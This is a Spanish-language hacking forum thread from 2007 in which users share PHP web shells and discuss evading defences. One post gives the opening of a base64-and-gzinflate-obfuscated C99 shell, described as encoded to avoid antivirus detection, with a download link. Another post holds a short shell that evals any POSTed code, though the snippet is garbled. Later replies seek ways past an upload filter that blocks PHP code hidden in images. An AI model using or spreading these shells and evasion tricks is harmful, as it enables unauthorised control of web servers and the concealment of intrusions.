C99 Shell.php cifrado en base 64

Iniciado por WHK, 21 Junio 2007, 09:17 AM

0 Miembros y 2 Visitantes están viendo este tema.

WHK

Conseguí una verción del C99 shell cifrado en su totalidad para no ser descubierto por los antivirus.
Como dice un amigo: Enjoy!

Citar<? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
[...]

WHK

excede el limite y no se ve el código completo  >:( lo subo y lo cuelgo... one moment...
------>Post modificado
Listo:
http://rapidshare.com/files/38464292/aAkjd5D-WHK.rar

laideker


yeikos

Mi PHP-Shell...  ;D

<?php
echo "<br><form method=\"POST\"><center><textarea name=\"var\" cols=\"40\" rows=\"10\"></textarea>
<br><input type=\"submit\"></center></form><p>"
.
eval(
str_replaceord(166), "'"str_replaceord(167), "\""$_POST['var'])))."</p>";
?>

дٳŦ٭

jeje, muy bueno. Una duda ¿la codificación es para burlar los A/V clientes o del server? no entiendo  :xD

Otra, por ejemplo, tengo un server que opera con algún "mod" que cuando intentas subir una "imagen" (con código PHP, véase el tuto de codebreak) me tira error y una advertencia  :xD ¿habrá alguna forma de saltarlo?

Saludos


Con sangre andaluza :)


yeikos

Si dices el mensaje quizás podamos ayudarte...

Azielito

Tal vez sea el de LFI???

el de los comentarios en el JPEG? ñ_ñ


Pos, podrias hacer lo mismo que hicieron con esta shell, usar la funcion eval()... (claro, tambien con base64_decode() ) ^^

дٳŦ٭

El mensaje es simple "Se ha detectado código PHP en su imagen, no se ha podido subir y se ha reportado su ip xxx.xxx.xxx.xxx".

No Aziel, de hecho ya iba cifrado el código con Zend, ni idea como saltar ese filtro.

Saludos


Con sangre andaluza :)


fitu

disculpen mi ignoracia, pero la verdad no entiendo de q se trata  :-[
baje el .rar y no comprendo para q sirve

Deka_10

Cita de: fitu en 23 Junio 2007, 07:11 AM
disculpen mi ignoracia, pero la verdad no entiendo de q se trata  :-[
baje el .rar y no comprendo para q sirve

entonces para que lo bajas?
Islam != Terrorism